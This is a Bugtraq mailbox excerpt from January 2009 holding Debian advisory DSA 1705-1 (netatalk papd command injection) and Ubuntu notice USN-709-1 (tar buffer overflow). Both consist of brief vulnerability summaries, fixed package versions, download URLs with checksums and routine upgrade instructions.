Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ---------------------------------

From - Thu Jan 15 16:42:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005a02
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39199-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 315DBED930
for <lists@securityspace.com>; Thu, 15 Jan 2009 16:38:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4DEED236FCC; Thu, 15 Jan 2009 14:21:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2813 invoked from network); 15 Jan 2009 20:37:08 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Thu, 15 Jan 2009 22:00:47 +0100
From: Nico Golde <nion@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090115210047.GA8901@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.213.194
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1705-1] New netatalk packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <6O97xFSBJRI.A.SLC.SQ6bJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Thu, 15 Jan 2009 21:01:06 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1705-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
January 15th, 2009                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : netatalk
Vulnerability  : missing input sanitising
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2008-5718
Debian Bug     : 510585

It was discovered that netatalk, an implementation of the AppleTalk
suite, is affected by a command injection vulnerability when processing
PostScript streams via papd.  This could lead to the execution of
arbitrary code.  Please note that this only affects installations that are
configured to use a pipe command in combination with wildcard symbols
substituted with values of the printed job.

For the stable distribution (etch) this problem has been fixed in
version 2.0.3-4+etch1.

For the upcoming stable distribution (lenny) this problem has been fixed
in version 2.0.3-11+lenny1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.4~beta2-1.

We recommend that you upgrade your netatalk package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.diff.gz
    Size/MD5 checksum:    27582 efc06139ef2adba4ca71c4ff9effefd2
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3.orig.tar.gz
    Size/MD5 checksum:  1920570 17917abd7d255d231cc0c6188ccd27fb
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.dsc
    Size/MD5 checksum:      822 eb3fc44340caed42978dea8b8e8cc53d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_alpha.deb
    Size/MD5 checksum:   869526 2a7d4250ee8380227231cd68cc70b5e4

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_amd64.deb
    Size/MD5 checksum:   751530 67f12f90fa7e11d8dfa791f36ee05e22

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_arm.deb
    Size/MD5 checksum:   729204 14b32580e4d93588404c1669074f9f09

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_hppa.deb
    Size/MD5 checksum:   800306 26eb091564c8077955d41ac42b585868

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_i386.deb
    Size/MD5 checksum:   706600 542cfc6b12f76ed4a068a389fa059372

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_ia64.deb
    Size/MD5 checksum:  1007572 a5393f96b01e65c8daece94babe663c2

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mips.deb
    Size/MD5 checksum:   776996 5d25c6809bfd2c3a6d3b29be1bd5e5e4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mipsel.deb
    Size/MD5 checksum:   773318 c6393e566664dbd1959e7c154ae90e37

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_powerpc.deb
    Size/MD5 checksum:   757606 ba364451858fc30ce3a4e2996ab316b0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_s390.deb
    Size/MD5 checksum:   770290 7970c3e8038bd51b6089cf824af789d6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_sparc.deb
    Size/MD5 checksum:   711964 fe24e2794125763c9548f522fd152a88


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklvo3wACgkQXm3vHE4uylrXCwCgsIdRo/L8Sf2ObeKwzj8Feuix
d+EAn1s6asea2Ygbs5BJjptm9xC+56wn
=uODl
-----END PGP SIGNATURE-----

From - Thu Jan 15 17:12:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005a07
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39201-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 98CA8ED891
for <lists@securityspace.com>; Thu, 15 Jan 2009 17:09:55 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 872E9143775; Thu, 15 Jan 2009 15:05:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4975 invoked from network); 15 Jan 2009 21:31:57 -0000
Date: Thu, 15 Jan 2009 15:55:53 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-709-1] tar vulnerability
Message-ID: <20090115215553.GE4202@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="uCPdOCrL+PnN2Vxy"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--uCPdOCrL+PnN2Vxy
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-709-1           January 15, 2009
tar vulnerability
CVE-2007-4476
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  tar                             1.15.1-2ubuntu2.3

Ubuntu 7.10:
  tar                             1.18-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Dmitry V. Levin discovered a buffer overflow in tar. If a user or automated
system were tricked into opening a specially crafted tar file, an attacker
could crash tar or possibly execute arbitrary code with the privileges of the
user invoking the program.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.diff.gz
      Size/MD5:    31101 bd2a94f0578416e4ad7ed5d8e0eaab15
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.dsc
      Size/MD5:      582 6395ad2276cbfb04535c8e9a760184c2
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz
      Size/MD5:  2204322 d87021366fe6488e9dc398fcdcb6ed7d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_amd64.deb
      Size/MD5:   532580 8bf4846b9b2108f42886784c794c01f6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_i386.deb
      Size/MD5:   519940 3ddc9cb9cf77bf95d711eef4b3f7851c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_powerpc.deb
      Size/MD5:   534426 0385fa88092124b117af7cd37bc2c588

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_sparc.deb
      Size/MD5:   524246 8b1ad8790f52ca7282a76a96b6b134cc

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.diff.gz
      Size/MD5:    47111 588df897391765ca5523e6ab611ed32b
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.dsc
      Size/MD5:      679 bc6cbaab0f63ef2289c49344ed88d6df
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18.orig.tar.gz
      Size/MD5:  2381295 c5fc59099be4419d18f59fe8a7946017

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_amd64.deb
      Size/MD5:   384512 b9f347f8bb3f1209a2f2ba6b69a06eb6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_i386.deb
      Size/MD5:   339818 611afdfeb25440e65e3d722947408f5c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tar/tar_1.18-2ubuntu1.1_lpia.deb
      Size/MD5:   339942 1c900b255c7fb9d2f8f7b69a0d737d26

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_powerpc.deb
      Size/MD5:   359094 b790c9aa4e73dab09ca6892456970b71

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_sparc.deb
      Size/MD5:   342586 02aa39721b80469a26062f4c86e93b08